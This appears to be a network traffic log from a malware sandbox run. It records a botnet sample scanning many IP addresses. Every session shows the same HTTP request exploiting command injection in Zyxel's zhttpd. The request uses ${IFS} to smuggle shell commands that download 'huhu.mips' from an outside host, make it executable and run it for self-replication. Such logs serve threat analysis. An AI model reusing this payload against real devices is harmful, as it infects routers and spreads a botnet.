                                                      Feb 2, 2024 06:36:03.867153883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7082192.168.2.143925619.248.217.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.867202044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7083192.168.2.1441694111.173.148.135443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.867219925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7084192.168.2.144702436.15.159.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.867281914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7085192.168.2.1438312202.66.247.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.867321014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7086192.168.2.145818894.62.234.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.867367983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7087192.168.2.145316452.37.1.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.867389917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7088192.168.2.1458430149.105.51.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.867438078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7089192.168.2.1456658118.127.64.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.867470026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7090192.168.2.1455288105.231.93.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.867516041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7091192.168.2.145624614.241.9.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.867575884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7092192.168.2.143648243.98.208.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.867588997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7093192.168.2.145581685.188.233.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.867625952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7094192.168.2.145878042.246.117.204443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.867661953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7095192.168.2.1449228156.41.190.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.867713928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7096192.168.2.145762018.237.129.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.867737055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7097192.168.2.1437292189.193.92.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.867785931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7098192.168.2.1449014102.38.90.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.867822886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7099192.168.2.144718289.113.113.56443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.867871046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7100192.168.2.1438824181.214.241.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.867909908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7101192.168.2.1439522154.23.91.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.867933035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7102192.168.2.146037423.126.32.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.867995024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7103192.168.2.1459864121.118.38.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.868030071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7104192.168.2.144088484.152.158.77443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.868047953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7105192.168.2.1447960140.181.221.147443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.868098021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7106192.168.2.14452485.41.6.150443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.868141890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7107192.168.2.1457502202.171.8.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.868179083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7108192.168.2.14472709.165.115.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.868225098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7109192.168.2.1449680150.238.70.143443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.868258953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7110192.168.2.143342480.169.52.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.868297100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7111192.168.2.1453754160.87.93.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.868345022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7112192.168.2.144272252.173.198.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.868387938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7113192.168.2.1441248172.54.13.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.868421078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7114192.168.2.1457970158.182.72.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.868451118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7115192.168.2.1436232106.26.179.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.868505001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7116192.168.2.143623096.192.188.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.868545055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7117192.168.2.143722632.194.70.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.868583918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7118192.168.2.1456880148.0.164.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.868630886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7119192.168.2.1457358146.211.170.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.868681908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7120192.168.2.144225653.87.165.55443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.868710995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7121192.168.2.145882612.189.103.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.868774891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7122192.168.2.1447076130.216.216.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.868797064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7123192.168.2.1448718212.173.106.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.868829012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7124192.168.2.144662872.212.27.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.868885994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7125192.168.2.1438492204.123.17.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.868915081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7126192.168.2.1451854195.127.184.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.868972063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7127192.168.2.1435254114.77.22.5443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.869012117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7128192.168.2.1438218186.85.33.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.869046926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7129192.168.2.145250265.194.55.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.869091034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7130192.168.2.145557418.123.73.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.869122028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7131192.168.2.145319443.184.202.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.869189024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7132192.168.2.143734693.93.12.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.869204044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7133192.168.2.14434561.23.176.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.869239092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7134192.168.2.143900425.29.205.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.869286060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7135192.168.2.1440572143.91.228.85443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.869334936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7136192.168.2.1445448204.42.2.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.869390011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7137192.168.2.143547271.48.197.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.869421005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7138192.168.2.143654638.220.4.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.869469881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7139192.168.2.1455546135.147.161.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.869524002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7140192.168.2.1444108208.26.131.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.869565010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7141192.168.2.1437528196.89.195.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.869617939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7142192.168.2.1452382217.98.187.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.869658947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7143192.168.2.1443488124.211.65.86443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.869688988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7144192.168.2.1458192223.6.53.201443
                                                      TimestampBytes transferredDirectionData
